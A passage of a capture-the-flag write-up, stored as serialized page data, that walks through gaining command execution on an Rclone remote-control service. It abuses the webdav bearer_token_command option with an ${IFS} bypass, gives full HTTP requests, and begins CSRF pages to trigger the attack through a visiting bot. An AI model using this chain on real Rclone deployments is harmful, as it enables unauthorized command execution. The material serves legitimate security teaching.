",{"type":33,"tag":128,"props":23173,"children":23174},{"style":140},[23175],{"type":38,"value":23176},"\"--\"",{"type":33,"tag":128,"props":23178,"children":23179},{"style":323},[23180],{"type":38,"value":3262},{"type":33,"tag":128,"props":23182,"children":23183},{"class":130,"line":1177},[23184,23189],{"type":33,"tag":128,"props":23185,"children":23186},{"style":1576},[23187],{"type":38,"value":23188},"CMD",{"type":33,"tag":128,"props":23190,"children":23191},{"style":323},[23192],{"type":38,"value":23193}," rclone rcd --rc-addr 0.0.0.0:5572 --rc-web-gui --rc-user $SECRET --rc-pass $SECRET --rc-web-gui-no-open-browser\n",{"type":33,"tag":47,"props":23195,"children":23196},{},[23197],{"type":38,"value":23198},"The bot, on the other hand, does nothing but authenticate itself on the Rclone service and visit the page that is passed in the body of the post request.",{"type":33,"tag":114,"props":23200,"children":23201},{"lang":5526},[23202],{"type":33,"tag":119,"props":23203,"children":23205},{"code":23204,"language":5526,"meta":8,"className":5530,"style":8},"[...]\napp.post('/submit', async (req, res) => {\n const { url } = req.body\n[...]\n try {\n console.log(`[+] Sending ${url} to bot`)\n await visit(url)\n res.send('OK')\n } catch (e) {\n [...]\n }\n})\n[...]\n",[23206],{"type":33,"tag":105,"props":23207,"children":23208},{"__ignoreMap":8},[23209,23217,23286,23322,23329,23340,23393,23417,23455,23483,23491,23498,23506],{"type":33,"tag":128,"props":23210,"children":23211},{"class":130,"line":131},[23212],{"type":33,"tag":128,"props":23213,"children":23214},{"style":312},[23215],{"type":38,"value":23216},"[...]\n",{"type":33,"tag":128,"props":23218,"children":23219},{"class":130,"line":362},[23220,23225,23229,23233,23237,23241,23246,23250,23254,23258,23262,23266,23270,23274,23278,23282],{"type":33,"tag":128,"props":23221,"children":23222},{"style":306},[23223],{"type":38,"value":23224},"app",{"type":33,"tag":128,"props":23226,"children":23227},{"style":312},[23228],{"type":38,"value":215},{"type":33,"tag":128,"props":23230,"children":23231},{"style":135},[23232],{"type":38,"value":5561},{"type":33,"tag":128,"props":23234,"children":23235},{"style":312},[23236],{"type":38,"value":5566},{"type":33,"tag":128,"props":23238,"children":23239},{"style":676},[23240],{"type":38,"value":6040},{"type":33,"tag":128,"props":23242,"children":23243},{"style":140},[23244],{"type":38,"value":23245},"/submit",{"type":33,"tag":128,"props":23247,"children":23248},{"style":676},[23249],{"type":38,"value":6040},{"type":33,"tag":128,"props":23251,"children":23252},{"style":312},[23253],{"type":38,"value":5584},{"type":33,"tag":128,"props":23255,"children":23256},{"style":300},[23257],{"type":38,"value":5598},{"type":33,"tag":128,"props":23259,"children":23260},{"style":312},[23261],{"type":38,"value":2852},{"type":33,"tag":128,"props":23263,"children":23264},{"style":306},[23265],{"type":38,"value":5607},{"type":33,"tag":128,"props":23267,"children":23268},{"style":312},[23269],{"type":38,"value":5584},{"type":33,"tag":128,"props":23271,"children":23272},{"style":306},[23273],{"type":38,"value":5616},{"type":33,"tag":128,"props":23275,"children":23276},{"style":312},[23277],{"type":38,"value":2966},{"type":33,"tag":128,"props":23279,"children":23280},{"style":312},[23281],{"type":38,"value":5625},{"type":33,"tag":128,"props":23283,"children":23284},{"style":312},[23285],{"type":38,"value":762},{"type":33,"tag":128,"props":23287,"children":23288},{"class":130,"line":403},[23289,23293,23297,23301,23305,23309,23313,23317],{"type":33,"tag":128,"props":23290,"children":23291},{"style":300},[23292],{"type":38,"value":5696},{"type":33,"tag":128,"props":23294,"children":23295},{"style":312},[23296],{"type":38,"value":5642},{"type":33,"tag":128,"props":23298,"children":23299},{"style":306},[23300],{"type":38,"value":15126},{"type":33,"tag":128,"props":23302,"children":23303},{"style":312},[23304],{"type":38,"value":5652},{"type":33,"tag":128,"props":23306,"children":23307},{"style":312},[23308],{"type":38,"value":5657},{"type":33,"tag":128,"props":23310,"children":23311},{"style":306},[23312],{"type":38,"value":5662},{"type":33,"tag":128,"props":23314,"children":23315},{"style":312},[23316],{"type":38,"value":215},{"type":33,"tag":128,"props":23318,"children":23319},{"style":306},[23320],{"type":38,"value":23321},"body\n",{"type":33,"tag":128,"props":23323,"children":23324},{"class":130,"line":739},[23325],{"type":33,"tag":128,"props":23326,"children":23327},{"style":312},[23328],{"type":38,"value":23216},{"type":33,"tag":128,"props":23330,"children":23331},{"class":130,"line":765},[23332,23336],{"type":33,"tag":128,"props":23333,"children":23334},{"style":1576},[23335],{"type":38,"value":16034},{"type":33,"tag":128,"props":23337,"children":23338},{"style":312},[23339],{"type":38,"value":762},{"type":33,"tag":128,"props":23341,"children":23342},{"class":130,"line":804},[23343,23347,23351,23355,23359,23363,23368,23372,23376,23380,23385,23389],{"type":33,"tag":128,"props":23344,"children":23345},{"style":306},[23346],{"type":38,"value":16105},{"type":33,"tag":128,"props":23348,"children":23349},{"style":312},[23350],{"type":38,"value":215},{"type":33,"tag":128,"props":23352,"children":23353},{"style":135},[23354],{"type":38,"value":13157},{"type":33,"tag":128,"props":23356,"children":23357},{"style":312},[23358],{"type":38,"value":5566},{"type":33,"tag":128,"props":23360,"children":23361},{"style":676},[23362],{"type":38,"value":5739},{"type":33,"tag":128,"props":23364,"children":23365},{"style":140},[23366],{"type":38,"value":23367},"[+] Sending ",{"type":33,"tag":128,"props":23369,"children":23370},{"style":1576},[23371],{"type":38,"value":5720},{"type":33,"tag":128,"props":23373,"children":23374},{"style":140},[23375],{"type":38,"value":13952},{"type":33,"tag":128,"props":23377,"children":23378},{"style":1576},[23379],{"type":38,"value":5730},{"type":33,"tag":128,"props":23381,"children":23382},{"style":140},[23383],{"type":38,"value":23384}," to bot",{"type":33,"tag":128,"props":23386,"children":23387},{"style":676},[23388],{"type":38,"value":5739},{"type":33,"tag":128,"props":23390,"children":23391},{"style":312},[23392],{"type":38,"value":2427},{"type":33,"tag":128,"props":23394,"children":23395},{"class":130,"line":839},[23396,23400,23405,23409,23413],{"type":33,"tag":128,"props":23397,"children":23398},{"style":1576},[23399],{"type":38,"value":17718},{"type":33,"tag":128,"props":23401,"children":23402},{"style":135},[23403],{"type":38,"value":23404}," visit",{"type":33,"tag":128,"props":23406,"children":23407},{"style":312},[23408],{"type":38,"value":5566},{"type":33,"tag":128,"props":23410,"children":23411},{"style":306},[23412],{"type":38,"value":13952},{"type":33,"tag":128,"props":23414,"children":23415},{"style":312},[23416],{"type":38,"value":2427},{"type":33,"tag":128,"props":23418,"children":23419},{"class":130,"line":848},[23420,23425,23429,23434,23438,23442,23447,23451],{"type":33,"tag":128,"props":23421,"children":23422},{"style":306},[23423],{"type":38,"value":23424}," res",{"type":33,"tag":128,"props":23426,"children":23427},{"style":312},[23428],{"type":38,"value":215},{"type":33,"tag":128,"props":23430,"children":23431},{"style":135},[23432],{"type":38,"value":23433},"send",{"type":33,"tag":128,"props":23435,"children":23436},{"style":312},[23437],{"type":38,"value":5566},{"type":33,"tag":128,"props":23439,"children":23440},{"style":676},[23441],{"type":38,"value":6040},{"type":33,"tag":128,"props":23443,"children":23444},{"style":140},[23445],{"type":38,"value":23446},"OK",{"type":33,"tag":128,"props":23448,"children":23449},{"style":676},[23450],{"type":38,"value":6040},{"type":33,"tag":128,"props":23452,"children":23453},{"style":312},[23454],{"type":38,"value":2427},{"type":33,"tag":128,"props":23456,"children":23457},{"class":130,"line":976},[23458,23462,23466,23470,23475,23479],{"type":33,"tag":128,"props":23459,"children":23460},{"style":312},[23461],{"type":38,"value":14264},{"type":33,"tag":128,"props":23463,"children":23464},{"style":1576},[23465],{"type":38,"value":6855},{"type":33,"tag":128,"props":23467,"children":23468},{"style":312},[23469],{"type":38,"value":2852},{"type":33,"tag":128,"props":23471,"children":23472},{"style":306},[23473],{"type":38,"value":23474},"e",{"type":33,"tag":128,"props":23476,"children":23477},{"style":312},[23478],{"type":38,"value":2966},{"type":33,"tag":128,"props":23480,"children":23481},{"style":312},[23482],{"type":38,"value":762},{"type":33,"tag":128,"props":23484,"children":23485},{"class":130,"line":988},[23486],{"type":33,"tag":128,"props":23487,"children":23488},{"style":312},[23489],{"type":38,"value":23490}," [...]\n",{"type":33,"tag":128,"props":23492,"children":23493},{"class":130,"line":1001},[23494],{"type":33,"tag":128,"props":23495,"children":23496},{"style":312},[23497],{"type":38,"value":6760},{"type":33,"tag":128,"props":23499,"children":23500},{"class":130,"line":1014},[23501],{"type":33,"tag":128,"props":23502,"children":23503},{"style":312},[23504],{"type":38,"value":23505},"})\n",{"type":33,"tag":128,"props":23507,"children":23508},{"class":130,"line":1026},[23509],{"type":33,"tag":128,"props":23510,"children":23511},{"style":312},[23512],{"type":38,"value":23216},{"type":33,"tag":114,"props":23514,"children":23515},{"lang":5526},[23516],{"type":33,"tag":119,"props":23517,"children":23519},{"code":23518,"language":5526,"meta":8,"className":5530,"style":8},"const visit = async url => {\n[...]\n context = await browser.createBrowserContext()\n\n const page1 = await context.newPage()\n await page1.goto(LOGIN_URL)\n await page1.close()\n\n const page2 = await context.newPage()\n await Promise.race([\n page2.goto(url, {\n waitUntil: 'networkidle0'\n }),\n sleep(5000)\n ])\n[...]\n}\n",[23520],{"type":33,"tag":105,"props":23521,"children":23522},{"__ignoreMap":8},[23523,23554,23561,23595,23602,23640,23673,23697,23704,23740,23765,23797,23822,23830,23851,23859,23866],{"type":33,"tag":128,"props":23524,"children":23525},{"class":130,"line":131},[23526,23530,23534,23538,23542,23546,23550],{"type":33,"tag":128,"props":23527,"children":23528},{"style":300},[23529],{"type":38,"value":15973},{"type":33,"tag":128,"props":23531,"children":23532},{"style":135},[23533],{"type":38,"value":23404},{"type":33,"tag":128,"props":23535,"children":23536},{"style":312},[23537],{"type":38,"value":5657},{"type":33,"tag":128,"props":23539,"children":23540},{"style":300},[23541],{"type":38,"value":5598},{"type":33,"tag":128,"props":23543,"children":23544},{"style":306},[23545],{"type":38,"value":15126},{"type":33,"tag":128,"props":23547,"children":23548},{"style":312},[23549],{"type":38,"value":5625},{"type":33,"tag":128,"props":23551,"children":23552},{"style":312},[23553],{"type":38,"value":762},{"type":33,"tag":128,"props":23555,"children":23556},{"class":130,"line":362},[23557],{"type":33,"tag":128,"props":23558,"children":23559},{"style":312},[23560],{"type":38,"value":23216},{"type":33,"tag":128,"props":23562,"children":23563},{"class":130,"line":403},[23564,23569,23573,23577,23582,23586,23591],{"type":33,"tag":128,"props":23565,"children":23566},{"style":306},[23567],{"type":38,"value":23568}," context",{"type":33,"tag":128,"props":23570,"children":23571},{"style":312},[23572],{"type":38,"value":5657},{"type":33,"tag":128,"props":23574,"children":23575},{"style":1576},[23576],{"type":38,"value":5796},{"type":33,"tag":128,"props":23578,"children":23579},{"style":306},[23580],{"type":38,"value":23581}," browser",{"type":33,"tag":128,"props":23583,"children":23584},{"style":312},[23585],{"type":38,"value":215},{"type":33,"tag":128,"props":23587,"children":23588},{"style":135},[23589],{"type":38,"value":23590},"createBrowserContext",{"type":33,"tag":128,"props":23592,"children":23593},{"style":312},[23594],{"type":38,"value":7857},{"type":33,"tag":128,"props":23596,"children":23597},{"class":130,"line":739},[23598],{"type":33,"tag":128,"props":23599,"children":23600},{"emptyLinePlaceholder":896},[23601],{"type":38,"value":899},{"type":33,"tag":128,"props":23603,"children":23604},{"class":130,"line":765},[23605,23609,23614,23618,23622,23627,23631,23636],{"type":33,"tag":128,"props":23606,"children":23607},{"style":300},[23608],{"type":38,"value":15121},{"type":33,"tag":128,"props":23610,"children":23611},{"style":306},[23612],{"type":38,"value":23613}," page1",{"type":33,"tag":128,"props":23615,"children":23616},{"style":312},[23617],{"type":38,"value":5657},{"type":33,"tag":128,"props":23619,"children":23620},{"style":1576},[23621],{"type":38,"value":5796},{"type":33,"tag":128,"props":23623,"children":23624},{"style":306},[23625],{"type":38,"value":23626}," context",{"type":33,"tag":128,"props":23628,"children":23629},{"style":312},[23630],{"type":38,"value":215},{"type":33,"tag":128,"props":23632,"children":23633},{"style":135},[23634],{"type":38,"value":23635},"newPage",{"type":33,"tag":128,"props":23637,"children":23638},{"style":312},[23639],{"type":38,"value":7857},{"type":33,"tag":128,"props":23641,"children":23642},{"class":130,"line":804},[23643,23647,23651,23655,23660,23664,23669],{"type":33,"tag":128,"props":23644,"children":23645},{"style":1576},[23646],{"type":38,"value":17718},{"type":33,"tag":128,"props":23648,"children":23649},{"style":306},[23650],{"type":38,"value":23613},{"type":33,"tag":128,"props":23652,"children":23653},{"style":312},[23654],{"type":38,"value":215},{"type":33,"tag":128,"props":23656,"children":23657},{"style":135},[23658],{"type":38,"value":23659},"goto",{"type":33,"tag":128,"props":23661,"children":23662},{"style":312},[23663],{"type":38,"value":5566},{"type":33,"tag":128,"props":23665,"children":23666},{"style":306},[23667],{"type":38,"value":23668},"LOGIN_URL",{"type":33,"tag":128,"props":23670,"children":23671},{"style":312},[23672],{"type":38,"value":2427},{"type":33,"tag":128,"props":23674,"children":23675},{"class":130,"line":839},[23676,23680,23684,23688,23693],{"type":33,"tag":128,"props":23677,"children":23678},{"style":1576},[23679],{"type":38,"value":17718},{"type":33,"tag":128,"props":23681,"children":23682},{"style":306},[23683],{"type":38,"value":23613},{"type":33,"tag":128,"props":23685,"children":23686},{"style":312},[23687],{"type":38,"value":215},{"type":33,"tag":128,"props":23689,"children":23690},{"style":135},[23691],{"type":38,"value":23692},"close",{"type":33,"tag":128,"props":23694,"children":23695},{"style":312},[23696],{"type":38,"value":7857},{"type":33,"tag":128,"props":23698,"children":23699},{"class":130,"line":848},[23700],{"type":33,"tag":128,"props":23701,"children":23702},{"emptyLinePlaceholder":896},[23703],{"type":38,"value":899},{"type":33,"tag":128,"props":23705,"children":23706},{"class":130,"line":976},[23707,23711,23716,23720,23724,23728,23732,23736],{"type":33,"tag":128,"props":23708,"children":23709},{"style":300},[23710],{"type":38,"value":15121},{"type":33,"tag":128,"props":23712,"children":23713},{"style":306},[23714],{"type":38,"value":23715}," page2",{"type":33,"tag":128,"props":23717,"children":23718},{"style":312},[23719],{"type":38,"value":5657},{"type":33,"tag":128,"props":23721,"children":23722},{"style":1576},[23723],{"type":38,"value":5796},{"type":33,"tag":128,"props":23725,"children":23726},{"style":306},[23727],{"type":38,"value":23626},{"type":33,"tag":128,"props":23729,"children":23730},{"style":312},[23731],{"type":38,"value":215},{"type":33,"tag":128,"props":23733,"children":23734},{"style":135},[23735],{"type":38,"value":23635},{"type":33,"tag":128,"props":23737,"children":23738},{"style":312},[23739],{"type":38,"value":7857},{"type":33,"tag":128,"props":23741,"children":23742},{"class":130,"line":988},[23743,23747,23751,23755,23760],{"type":33,"tag":128,"props":23744,"children":23745},{"style":1576},[23746],{"type":38,"value":17718},{"type":33,"tag":128,"props":23748,"children":23749},{"style":437},[23750],{"type":38,"value":13066},{"type":33,"tag":128,"props":23752,"children":23753},{"style":312},[23754],{"type":38,"value":215},{"type":33,"tag":128,"props":23756,"children":23757},{"style":135},[23758],{"type":38,"value":23759},"race",{"type":33,"tag":128,"props":23761,"children":23762},{"style":312},[23763],{"type":38,"value":23764},"([\n",{"type":33,"tag":128,"props":23766,"children":23767},{"class":130,"line":1001},[23768,23773,23777,23781,23785,23789,23793],{"type":33,"tag":128,"props":23769,"children":23770},{"style":306},[23771],{"type":38,"value":23772}," page2",{"type":33,"tag":128,"props":23774,"children":23775},{"style":312},[23776],{"type":38,"value":215},{"type":33,"tag":128,"props":23778,"children":23779},{"style":135},[23780],{"type":38,"value":23659},{"type":33,"tag":128,"props":23782,"children":23783},{"style":312},[23784],{"type":38,"value":5566},{"type":33,"tag":128,"props":23786,"children":23787},{"style":306},[23788],{"type":38,"value":13952},{"type":33,"tag":128,"props":23790,"children":23791},{"style":312},[23792],{"type":38,"value":5584},{"type":33,"tag":128,"props":23794,"children":23795},{"style":312},[23796],{"type":38,"value":762},{"type":33,"tag":128,"props":23798,"children":23799},{"class":130,"line":1014},[23800,23805,23809,23813,23818],{"type":33,"tag":128,"props":23801,"children":23802},{"style":437},[23803],{"type":38,"value":23804}," waitUntil",{"type":33,"tag":128,"props":23806,"children":23807},{"style":312},[23808],{"type":38,"value":284},{"type":33,"tag":128,"props":23810,"children":23811},{"style":676},[23812],{"type":38,"value":6739},{"type":33,"tag":128,"props":23814,"children":23815},{"style":140},[23816],{"type":38,"value":23817},"networkidle0",{"type":33,"tag":128,"props":23819,"children":23820},{"style":676},[23821],{"type":38,"value":10313},{"type":33,"tag":128,"props":23823,"children":23824},{"class":130,"line":1026},[23825],{"type":33,"tag":128,"props":23826,"children":23827},{"style":312},[23828],{"type":38,"value":23829}," }),\n",{"type":33,"tag":128,"props":23831,"children":23832},{"class":130,"line":1038},[23833,23838,23842,23847],{"type":33,"tag":128,"props":23834,"children":23835},{"style":135},[23836],{"type":38,"value":23837}," sleep",{"type":33,"tag":128,"props":23839,"children":23840},{"style":312},[23841],{"type":38,"value":5566},{"type":33,"tag":128,"props":23843,"children":23844},{"style":523},[23845],{"type":38,"value":23846},"5000",{"type":33,"tag":128,"props":23848,"children":23849},{"style":312},[23850],{"type":38,"value":2427},{"type":33,"tag":128,"props":23852,"children":23853},{"class":130,"line":1051},[23854],{"type":33,"tag":128,"props":23855,"children":23856},{"style":312},[23857],{"type":38,"value":23858}," ])\n",{"type":33,"tag":128,"props":23860,"children":23861},{"class":130,"line":1063},[23862],{"type":33,"tag":128,"props":23863,"children":23864},{"style":312},[23865],{"type":38,"value":23216},{"type":33,"tag":128,"props":23867,"children":23868},{"class":130,"line":1076},[23869],{"type":33,"tag":128,"props":23870,"children":23871},{"style":312},[23872],{"type":38,"value":854},{"type":33,"tag":47,"props":23874,"children":23875},{},[23876],{"type":38,"value":23877},"Note that the submitted URL to the bot must just comply with the HTTP standards, namely http or https + :// + domain",{"type":33,"tag":47,"props":23879,"children":23880},{},[23881],{"type":38,"value":23882},"So in one thing, our only entry point is the bot, and given the name of the challenge which suggests RCE, we potentially need to RCE on the Rclone service.",{"type":33,"tag":40,"props":23884,"children":23886},{"id":23885},"rce",[23887],{"type":38,"value":23888},"RCE ?",{"type":33,"tag":47,"props":23890,"children":23891},{},[23892,23894,23901],{"type":38,"value":23893},"To begin, we will explore the ",{"type":33,"tag":53,"props":23895,"children":23898},{"href":23896,"rel":23897},"https://github.com/rclone/rclone",[57],[23899],{"type":38,"value":23900},"source code of Rclone",{"type":38,"value":23902},", with the aim of looking for places that might allow RCE.",{"type":33,"tag":47,"props":23904,"children":23905},{},[23906],{"type":38,"value":23907},"Quickly, we come across the WebDav service which has an option that allows commands to be executed.",{"type":33,"tag":75,"props":23909,"children":23911},{"imgSrc":23910},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721244501/writeups/rclone/webdav_exec_command.webp",[],{"type":33,"tag":47,"props":23913,"children":23914},{},[23915,23917,23923],{"type":38,"value":23916},"However, note the use of the split function which will split our option at each space present in the command. An effective method to avoid breaking the command is to use the ",{"type":33,"tag":105,"props":23918,"children":23920},{"className":23919},[],[23921],{"type":38,"value":23922},"IFS",{"type":38,"value":23924}," bash variable which will be interpreted as a space in bash but will not be split by the go function.",{"type":33,"tag":47,"props":23926,"children":23927},{},[23928],{"type":38,"value":23929},"We can quickly test these options to see if we can execute commands on the Rclone service with a basic payload.",{"type":33,"tag":114,"props":23931,"children":23932},{"lang":116},[23933],{"type":33,"tag":119,"props":23934,"children":23936},{"code":23935,"language":116,"meta":8,"className":121,"style":8},"bash -c touch${IFS}/tmp/lolipop\n",[23937],{"type":33,"tag":105,"props":23938,"children":23939},{"__ignoreMap":8},[23940],{"type":33,"tag":128,"props":23941,"children":23942},{"class":130,"line":131},[23943,23947,23951,23956,23960,23964,23968],{"type":33,"tag":128,"props":23944,"children":23945},{"style":135},[23946],{"type":38,"value":116},{"type":33,"tag":128,"props":23948,"children":23949},{"style":151},[23950],{"type":38,"value":8707},{"type":33,"tag":128,"props":23952,"children":23953},{"style":140},[23954],{"type":38,"value":23955}," touch",{"type":33,"tag":128,"props":23957,"children":23958},{"style":312},[23959],{"type":38,"value":5720},{"type":33,"tag":128,"props":23961,"children":23962},{"style":306},[23963],{"type":38,"value":23922},{"type":33,"tag":128,"props":23965,"children":23966},{"style":312},[23967],{"type":38,"value":5730},{"type":33,"tag":128,"props":23969,"children":23970},{"style":140},[23971],{"type":38,"value":23972},"/tmp/lolipop\n",{"type":33,"tag":47,"props":23974,"children":23975},{},[23976],{"type":38,"value":23977},"Our HTTP request to create the remote will look like this:",{"type":33,"tag":75,"props":23979,"children":23981},{"imgSrc":23980},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245298/writeups/rclone/rclone_create_webdav_command.webp",[],{"type":33,"tag":47,"props":23983,"children":23984},{},[23985],{"type":38,"value":23986},"Here is the HTTP request.\nWe can see that we have several parameters in the body of the request:",{"type":33,"tag":239,"props":23988,"children":23989},{},[23990,24008,24013],{"type":33,"tag":243,"props":23991,"children":23992},{},[23993,23995],{"type":38,"value":23994},"Parameters:\n",{"type":33,"tag":239,"props":23996,"children":23997},{},[23998,24003],{"type":33,"tag":243,"props":23999,"children":24000},{},[24001],{"type":38,"value":24002},"Url: defines the url of the webdav (in our case it doesn't matter if this url doesn't work)",{"type":33,"tag":243,"props":24004,"children":24005},{},[24006],{"type":38,"value":24007},"bearer_token_command: which will contain our bash payload that will be executed by the rclone service",{"type":33,"tag":243,"props":24009,"children":24010},{},[24011],{"type":38,"value":24012},"Name: which will correspond to the name of the remote",{"type":33,"tag":243,"props":24014,"children":24015},{},[24016],{"type":38,"value":24017},"Type: the type of remote we are using here is Webdav",{"type":33,"tag":119,"props":24019,"children":24021},{"code":24020},"POST /config/create HTTP/1.1\nHost: localhost:5572\nContent-Type: application/json\nAuthorization: Basic c2VjcmV0OnNlY3JldA==\nContent-Length: 167\n\n{\n \"parameters\": {\n \"url\": \"http://not_exist.localhost:9999\",\n \"bearer_token_command\":\"bash -c touch${IFS}/tmp/lolipop\"\n },\n \"name\":\"test_webdav\",\n \"type\":\"webdav\"\n}\n",[24022],{"type":33,"tag":105,"props":24023,"children":24024},{"__ignoreMap":8},[24025],{"type":38,"value":24020},{"type":33,"tag":47,"props":24027,"children":24028},{},[24029],{"type":38,"value":24030},"In order to execute our payload, it is necessary to open the config recently created and list the files present in the remote.",{"type":33,"tag":47,"props":24032,"children":24033},{},[24034],{"type":38,"value":24035},"For that we use the following request:",{"type":33,"tag":119,"props":24037,"children":24039},{"code":24038},"POST /operations/list HTTP/1.1\nHost: localhost:5572\nContent-Type: application/json\nAuthorization: Basic c2VjcmV0OnNlY3JldA==\nContent-Length: 33\n\n{\n \"fs\":\"test_webdav:\",\n \"remote\":\"\"\n}\n",[24040],{"type":33,"tag":105,"props":24041,"children":24042},{"__ignoreMap":8},[24043],{"type":38,"value":24038},{"type":33,"tag":75,"props":24045,"children":24047},{"imgSrc":24046},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245298/writeups/rclone/rclone_explorer.webp",[],{"type":33,"tag":47,"props":24049,"children":24050},{},[24051],{"type":38,"value":24052},"We can see that our file has been successfully created.",{"type":33,"tag":75,"props":24054,"children":24056},{"imgSrc":24055},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245280/writeups/rclone/ls_tmp.webp",[],{"type":33,"tag":47,"props":24058,"children":24059},{},[24060],{"type":38,"value":24061},"So we have a race on the rclone service, however for flag it is necessary to go through the bot.",{"type":33,"tag":47,"props":24063,"children":24064},{},[24065],{"type":38,"value":24066},"However, it is not possible for us to execute post requests with javascript as with the fetch command from a different domain, the credentials will not be used during the request and a prompt asking to authenticate will be displayed. We need to find a way to bypass this problem, such as with a CSRF, which is what we will look at in the next section.",{"type":33,"tag":40,"props":24068,"children":24070},{"id":24069},"gui-is-experimental",[24071],{"type":38,"value":24072},"GUI is experimental",{"type":33,"tag":47,"props":24074,"children":24075},{},[24076,24078,24085],{"type":38,"value":24077},"When we go to the ",{"type":33,"tag":53,"props":24079,"children":24082},{"href":24080,"rel":24081},"https://rclone.org/gui/",[57],[24083],{"type":38,"value":24084},"Rclone documentation",{"type":38,"value":24086},", we realize that the Gui option is marked as experimental.",{"type":33,"tag":75,"props":24088,"children":24090},{"imgSrc":24089},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245952/writeups/rclone/gui_experimental.webp",[],{"type":33,"tag":47,"props":24092,"children":24093},{},[24094,24096],{"type":38,"value":24095},"The documentation also gives us access to the front-end GitHub. ",{"type":33,"tag":53,"props":24097,"children":24100},{"href":24098,"rel":24099},"https://github.com/rclone/rclone-webui-react",[57],[24101],{"type":38,"value":24102},"rclone-webui-react",{"type":33,"tag":47,"props":24104,"children":24105},{},[24106,24108,24115],{"type":38,"value":24107},"In the GitHub, we can see ",{"type":33,"tag":53,"props":24109,"children":24112},{"href":24110,"rel":24111},"https://github.com/rclone/rclone-webui-react/issues/128",[57],[24113],{"type":38,"value":24114},"an open issue",{"type":38,"value":24116}," indicating that Rclone-webui is potentially vulnerable to CSRF attacks.",{"type":33,"tag":75,"props":24118,"children":24120},{"imgSrc":24119},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721245965/writeups/rclone/issue_csrf.webp",[],{"type":33,"tag":47,"props":24122,"children":24123},{},[24124],{"type":38,"value":24125},"A proof of concept is also provided, allowing us to understand that the parameters sent in the API's POST requests can also be sent in the query parameters.",{"type":33,"tag":47,"props":24127,"children":24128},{},[24129],{"type":38,"value":24130},"We therefore have the possibility from the bot to trigger a CSRF with our RCE payload that was created in the previous section. We can now test it with the bot in order to PoC the RCE via the bot.",{"type":33,"tag":47,"props":24132,"children":24133},{},[24134],{"type":38,"value":24135},"For this, we will create three files: two HTML files for CSRF and one index.html file that will allow us to open the two CSRF files, one to create the remote and one to trigger the RCE.",{"type":33,"tag":47,"props":24137,"children":24138},{},[24139],{"type":38,"value":24140},"We will use the same bash payload as before, but this time we will encode it in base64 to pass it as a query parameter.",{"type":33,"tag":114,"props":24142,"children":24143},{"lang":116},[24144],{"type":33,"tag":119,"props":24145,"children":24147},{"code":24146,"language":116,"meta":8,"className":121,"style":8},"bash -c touch${IFS}/tmp/lolipop_from_bot\n",[24148],{"type":33,"tag":105,"props":24149,"children":24150},{"__ignoreMap":8},[24151],{"type":33,"tag":128,"props":24152,"children":24153},{"class":130,"line":131},[24154,24158,24162,24166,24170,24174,24178],{"type":33,"tag":128,"props":24155,"children":24156},{"style":135},[24157],{"type":38,"value":116},{"type":33,"tag":128,"props":24159,"children":24160},{"style":151},[24161],{"type":38,"value":8707},{"type":33,"tag":128,"props":24163,"children":24164},{"style":140},[24165],{"type":38,"value":23955},{"type":33,"tag":128,"props":24167,"children":24168},{"style":312},[24169],{"type":38,"value":5720},{"type":33,"tag":128,"props":24171,"children":24172},{"style":306},[24173],{"type":38,"value":23922},{"type":33,"tag":128,"props":24175,"children":24176},{"style":312},[24177],{"type":38,"value":5730},{"type":33,"tag":128,"props":24179,"children":24180},{"style":140},[24181],{"type":38,"value":24182},"/tmp/lolipop_from_bot\n",{"type":33,"tag":47,"props":24184,"children":24185},{},[24186],{"type":38,"value":24187},"Below, find the three files that allow us to execute the command:",{"type":33,"tag":47,"props":24189,"children":24190},{},[24191],{"type":38,"value":24192},"Our index.html file which will contain the redirection to our two csrf:",{"type":33,"tag":114,"props":24194,"children":24195},{"lang":5929},[24196],{"type":33,"tag":119,"props":24197,"children":24199},{"code":24198,"language":5929,"meta":8,"className":5933,"style":8},"\u003C!-- index.html -->\n\u003Cscript>\n window.open(\"/1.html\", \"_blank\");\n setTimeout(() => {\n window.open(\"/2.html\", \"_blank\");\n }, 300);\n\u003C/script>\n",[24200],{"type":33,"tag":105,"props":24201,"children":24202},{"__ignoreMap":8},[24203,24210,24225,24277,24296,24347,24363],{"type":33,"tag":128,"props":24204,"children":24205},{"class":130,"line":131},[24206],{"type":33,"tag":128,"props":24207,"children":24208},{"style":5541},[24209],{"type":38,"value":21084},{"type":33,"tag":128,"props":24211,"children":24212},{"class":130,"line":362},[24213,24217,24221],{"type":33,"tag":128,"props":24214,"children":24215},{"style":312},[24216],{"type":38,"value":5977},{"type":33,"tag":128,"props":24218,"children":24219},{"style":1576},[24220],{"type":38,"value":15064},{"type":33,"tag":128,"props":24222,"children":24223},{"style":312},[24224],{"type":38,"value":6097},{"type":33,"tag":128,"props":24226,"children":24227},{"class":130,"line":403},[24228,24233,24237,24241,24245,24249,24253,24257,24261,24265,24269,24273],{"type":33,"tag":128,"props":24229,"children":24230},{"style":306},[24231],{"type":38,"value":24232}," window",{"type":33,"tag":128,"props":24234,"children":24235},{"style":312},[24236],{"type":38,"value":215},{"type":33,"tag":128,"props":24238,"children":24239},{"style":135},[24240],{"type":38,"value":21192},{"type":33,"tag":128,"props":24242,"children":24243},{"style":312},[24244],{"type":38,"value":5566},{"type":33,"tag":128,"props":24246,"children":24247},{"style":676},[24248],{"type":38,"value":669},{"type":33,"tag":128,"props":24250,"children":24251},{"style":140},[24252],{"type":38,"value":21205},{"type":33,"tag":128,"props":24254,"children":24255},{"style":676},[24256],{"type":38,"value":669},{"type":33,"tag":128,"props":24258,"children":24259},{"style":312},[24260],{"type":38,"value":5584},{"type":33,"tag":128,"props":24262,"children":24263},{"style":676},[24264],{"type":38,"value":679},{"type":33,"tag":128,"props":24266,"children":24267},{"style":140},[24268],{"type":38,"value":21222},{"type":33,"tag":128,"props":24270,"children":24271},{"style":676},[24272],{"type":38,"value":669},{"type":33,"tag":128,"props":24274,"children":24275},{"style":312},[24276],{"type":38,"value":5815},{"type":33,"tag":128,"props":24278,"children":24279},{"class":130,"line":739},[24280,24284,24288,24292],{"type":33,"tag":128,"props":24281,"children":24282},{"style":135},[24283],{"type":38,"value":8246},{"type":33,"tag":128,"props":24285,"children":24286},{"style":312},[24287],{"type":38,"value":8135},{"type":33,"tag":128,"props":24289,"children":24290},{"style":312},[24291],{"type":38,"value":5625},{"type":33,"tag":128,"props":24293,"children":